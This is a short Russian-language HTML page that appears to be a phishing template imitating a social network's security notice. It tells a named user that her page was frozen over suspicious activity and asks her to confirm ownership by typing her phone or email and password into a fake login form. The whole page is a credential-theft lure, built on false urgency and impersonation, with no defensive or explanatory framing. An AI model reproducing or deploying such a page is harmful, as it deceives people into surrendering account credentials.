<html>
	<head>
		<meta charset="utf-8">
		<link rel="stylesheet" href="CSS/ROL.css">
	</head>
	<body>
	<div id="page_header" class="p_head1 p_head_l777">
			<img src="IMG/top.png" width="40px">
			<input type="search" placeholder="Поиск">
		</div>
	<div  class="jopa">
		<img src="IMG/SOTKA.png">
	<p> Лиза, мы обнаружили подозрительную активность и <strong> временно заморозили </strong>
	Вашу страницу, что бы вырвать ее из рук злоумышленников.</p>
	<p> Что бы разморозить страницу, мы просим Вас подтвердить, что Вы владелец этой страницы и поменять пароль.</p>
	</div>
	<center>
	<p class="stells" >ВВЕСТИ ДАННЫЕ ЗДЕСЬ: </p>
	<center>
	<center>
	<div class="login">
			<form action="nepr.html">
				<input class="menuLoginp" type="text" name="email" id="index_email" value="" placeholder="Телефон или email">
				<input class="menuLoginp" type="password" name="pass" id="index_pass" value="" placeholder="Пароль" onkeyup="toggle('index_expire', !!this.value);toggle('index_forgot', !this.value)">
				<button class="menuLogbot" id="index_login_button">Войти</button>
				<a id="index_forgot" class="noPassword" href="VOSST.html" target="_top">Забыли пароль?</a>
            </form>
		</div>
        
	</center>
</html>